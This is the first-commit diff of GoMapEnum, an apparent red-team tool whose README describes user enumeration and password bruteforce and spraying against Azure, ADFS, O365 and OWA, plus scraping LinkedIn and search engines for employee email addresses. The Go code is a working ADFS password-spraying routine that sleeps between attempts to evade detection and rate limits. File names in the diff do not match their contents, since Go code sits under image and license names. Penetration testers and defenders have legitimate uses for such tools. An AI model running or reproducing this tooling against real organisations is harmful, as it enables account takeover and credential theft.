first commit

Author: nodauf

LICENSE

@@ -0,0 +1,65 @@
+# goEnumBruteSpray
+
+## Description
+
+### Summary
+The recommended module is o365 for user enumeration and passwords bruteforce / spray . Additional information can be retrieved to avoid account lockout, to know that the password is good but expired, MFA enabled,...
+
+
+### Linkedin
+This module should be used to retrieve a list of email addresses before validating them through a user enumeration module.
+The company will be searched on Linkedin and all people working at these companies will be returned in the specified format.
+
+The Linkedin's session cookie `li_at` is required.
+
+![User enumeration on owa](./images/linkedin-gather.png)
+
+### SearchEngine
+This module should be used to retrieve a list of email addresses before validating them through a user enumeration module.
+The company name will be searched on Google and Bing with a dork to find people working in the company (`site:linkedin.com/in+"%s"`). The results title will be parsed to output email addresses in the specified format.
+
+![User enumeration on owa](./images/searchEngine-gather.png)
+
+### Azure
+#### User enumeration
+The Azure module is only available to enumerate the users of a tenant. The authentication request will be made on `https://autologon.microsoftazuread-sso.com`, a detailed response shows if the account does not exist, a MFA is required, if the account is locked, ...
+
+![User enumeration on Azure](./images/azure-UserEnum.png)
+
+
+### ADFS
+#### Passwords bruteforce / spray
+The ADFS module is only available to bruteforce or spray a password. The authentication request is sent to `https://<target>/adfs/ls/idpinitiatedsignon.aspx?client-request-id=<randomGUID>&pullStatus=0`. An error message can informs the user if the password is expired
+
+![Password bruteforce / spraying on ADFS](./images/adfs-brute.png)
+
+### O365
+This module allows to enumerate users and bruteforce / spray passwords. 
+
+#### User enumeration
+Several modes are available: office, oauth2 and onedrive (not implemented yet). The office mode is recommended as no authentication is made. Oauth2 can retrieve additional information through [AADSTS error code](https://docs.microsoft.com/en-us/azure/active-directory/develop/reference-aadsts-error-codes) (MFA enable, locked account, disabled account)
+![Password bruteforce / spraying on o365](./images/o365-UserEnum.png)
+
+#### Passwords bruteforce / spray
+As for the user enumeration, two modes are available: oauth2 and autodiscover (not implemented yet). The Oauth2 is the recommended mode, it allows to get much information thanks to the [AADSTS error code](https://docs.microsoft.com/en-us/azure/active-directory/develop/reference-aadsts-error-codes).
+
+![User enumeration on o365](./images/o365-brute.png)
+
+### OWA
+This module allows to enumerate users and bruteforce / spray passwords. 
+
+#### User enumeration
+Enumeration is made with authentication requests. Authentication for a non-existent user will take longer than for a valid user. At first, the average response time for an invalid user will be calculated and then the response time for each authentication request will be compared.
+
+![User enumeration on owa](./images/owa-UserEnum.png)
+
+#### Passwords bruteforce / spray
+Please note that no account locking mechanism can be implemented because no information about it is returned.
+
+![Password bruteforce / spraying on owa](./images/owa-brute.png)
+
+## Credits
+https://github.com/busterb/msmailprobe
+https://github.com/0xZDH/o365spray/
+https://github.com/xFreed0m/ADFSpray/
+https://github.com/m8r0wn/CrossLinked

README.md

@@ -0,0 +1,8 @@
+module GoMapEnum
+
+go 1.16
+
+require (
+	github.com/fatih/color v1.13.0
+	github.com/spf13/cobra v1.2.1
+)

go.mod

@@ -0,0 +1,13 @@
+builds:
+  - goos:
+      - darwin
+      - linux
+      - windows
+    goarch:
+      - amd64
+      - arm64
+archives:
+  -
+    format_overrides:
+      - goos: windows
+        format: zip

go.sum

@@ -0,0 +1,69 @@
+package adfs
+
+import (
+	"GoMapEnum/src/utils"
+	"strconv"
+	"strings"
+	"sync"
+	"time"
+)
+
+// Brute will bruteforce or spray passwords on the specified users.
+func (options *Options) Brute() {
+	log = options.Log
+	var wg sync.WaitGroup
+	// If the target is not specified, we will try to find the ADFS URL with the endpoint getuserrealm
+	if options.Target == "" {
+		options.Target = options.findTarget(options.Domain)
+		if options.Target == "" {
+			log.Error("The ADFS URL was not found")
+			return
+		}
+		log.Verbose("An ADFS instance has been found on " + options.Target)
+	}
+	options.Users = utils.GetStringOrFile(options.Users)
+	options.Passwords = utils.GetStringOrFile(options.Passwords)
+	usersList := strings.Split(options.Users, "\n")
+	passwordList := strings.Split(options.Passwords, "\n")
+
+	queue := make(chan string)
+
+	for i := 0; i < options.Thread; i++ {
+		wg.Add(1)
+		go func(i int) {
+			defer wg.Done()
+			var j = 0
+			for email := range queue {
+				// Sleep to avoid detection and bypass rate-limiting
+				if options.Sleep != 0 {
+					options.Log.Debug("Sleep " + strconv.Itoa(options.Sleep) + " seconds")
+					time.Sleep(time.Duration(options.Sleep) * time.Second)
+				}
+				if options.NoBruteforce {
+					options.brute(email, passwordList[j])
+
+				} else {
+					for _, password := range passwordList {
+						if options.brute(email, password) {
+							break // No need to continue if password is valid
+						}
+					}
+				}
+				j++
+			}
+
+		}(i)
+	}
+
+	// Trim emails and send them to the pool of workers
+	for _, user := range usersList {
+		user = strings.ToValidUTF8(user, "")
+		user = strings.Trim(user, "\r")
+		user = strings.Trim(user, "\n")
+		queue <- user
+	}
+
+	close(queue)
+	wg.Wait()
+
+}

images/adfs-brute.png

@@ -0,0 +1,27 @@
+package adfs
+
+import (
+	"GoMapEnum/src/logger"
+	"GoMapEnum/src/utils"
+)
+
+var log *logger.Logger
+
+type Options struct {
+	Domain string
+	utils.BaseOptions
+}
+
+type userRealm struct {
+	AuthNForwardType        int64  `json:"AuthNForwardType"`
+	AuthURL                 string `json:"AuthURL"`
+	CloudInstanceIssuerURI  string `json:"CloudInstanceIssuerUri"`
+	CloudInstanceName       string `json:"CloudInstanceName"`
+	DomainName              string `json:"DomainName"`
+	FederationBrandName     string `json:"FederationBrandName"`
+	FederationGlobalVersion int64  `json:"FederationGlobalVersion"`
+	Login                   string `json:"Login"`
+	NameSpaceType           string `json:"NameSpaceType"`
+	State                   int64  `json:"State"`
+	UserState               int64  `json:"UserState"`
+}

images/azure-UserEnum.png

@@ -0,0 +1,102 @@
+package adfs
+
+import (
+	"GoMapEnum/src/utils"
+	"crypto/tls"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"net/url"
+	"strconv"
+	"strings"
+)
+
+var FIND_ADFS_URL = "https://login.microsoftonline.com/getuserrealm.srf?login=%s"
+var ADFS_URL = "https://%s/adfs/ls/idpinitiatedsignon.aspx?client-request-id=%s&pullStatus=0"
+
+func (options *Options) brute(username, password string) bool {
+	if len(strings.Split(username, "\\")) == 1 && len(strings.Split(username, "@")) == 1 {
+		log.Error("Only email format or Domain\\user are supported, skipping " + username)
+		return false
+	}
+	uuid, _ := utils.NewUUID()
+	adfsUrl := fmt.Sprintf(ADFS_URL, options.Target, uuid)
+	client := &http.Client{
+		// Not follow the redirect
+		CheckRedirect: func(req *http.Request, via []*http.Request) error {
+			return http.ErrUseLastResponse
+		},
+		Transport: &http.Transport{
+			TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
+			Proxy:           options.Proxy,
+		},
+	}
+
+	// Get the cookie MSISSamlRequest
+	data := url.Values{}
+	data.Set("SignInIdpSite", "SignInIdpSite")
+	data.Set("SignInSubmit", "Sign in")
+	data.Set("SingleSignOut", "SingleSignOut")
+	req, _ := http.NewRequest("POST", adfsUrl, strings.NewReader(data.Encode()))
+	req.Header.Add("User-Agent", utils.GetUserAgent())
+	req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
+	req.Header.Add("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8")
+	resp, err := client.Do(req)
+	if err != nil {
+		log.Fatal("Error while sending the request: " + err.Error())
+	}
+
+	// Authenticate
+	data = url.Values{}
+	data.Set("UserName", username)
+	data.Set("Password", password)
+	data.Set("AuthMethod", "FormsAuthentication")
+
+	req, _ = http.NewRequest("POST", adfsUrl, strings.NewReader(data.Encode()))
+	req.Header.Add("User-Agent", utils.GetUserAgent())
+	req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
+	req.Header.Add("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8")
+	req.Header.Add("Cookie", "MSISSamlRequest="+resp.Cookies()[0].Value)
+	resp, err = client.Do(req)
+	body, _ := ioutil.ReadAll(resp.Body)
+	if err != nil {
+		log.Fatal("Error while sending the request: " + err.Error())
+	}
+	log.Debug("Status code: " + strconv.Itoa(resp.StatusCode))
+	// Parse the response to know if the password match
+	if resp.StatusCode == 302 {
+		log.Success(username + " and " + password + " matched")
+		return true
+	} else if strings.Contains(string(body), "Your password has expired") {
+		log.Success(username + " and " + password + " matched but the password is expired")
+		return true
+	} else {
+		log.Fail(username + " and " + password + " does not matched")
+		return false
+	}
+
+}
+
+// findTarget try to find the ADFS url
+func (options *Options) findTarget(domain string) string {
+	var target string
+	url := fmt.Sprintf(FIND_ADFS_URL, domain)
+	body, _, err := utils.GetBodyInWebsite(url, options.Proxy, nil)
+	if err != nil {
+		log.Error(err.Error())
+		return ""
+	}
+	// Parse the response
+	var userRealmResponse userRealm
+	json.Unmarshal([]byte(body), &userRealmResponse)
+	if userRealmResponse.NameSpaceType == "Unknown" {
+		log.Error("Tenant " + domain + " not found")
+		return ""
+	} else if userRealmResponse.NameSpaceType == "Managed" {
+		log.Error("Not ADFS found for " + domain)
+		return ""
+	}
+	target = strings.Split(userRealmResponse.AuthURL, "/")[2]
+	return target
+}

images/linkedin-gather.png

@@ -0,0 +1,29 @@
+package azure
+
+import (
+	"GoMapEnum/src/utils"
+)
+
+type Options struct {
+	utils.BaseOptions
+}
+
+type azureResponse struct {
+	Body struct {
+		Fault struct {
+			Detail struct {
+				Text  string `xml:",chardata"`
+				Error struct {
+					Text          string `xml:",chardata"`
+					Psf           string `xml:"psf,attr"`
+					Value         string `xml:"value"`
+					Internalerror struct {
+						Chardata string `xml:",chardata"`
+						Code     string `xml:"code"`
+						Text     string `xml:"text"`
+					} `xml:"internalerror"`
+				} `xml:"error"`
+			} `xml:"Detail"`
+		} `xml:"Fault"`
+	} `xml:"Body"`
+}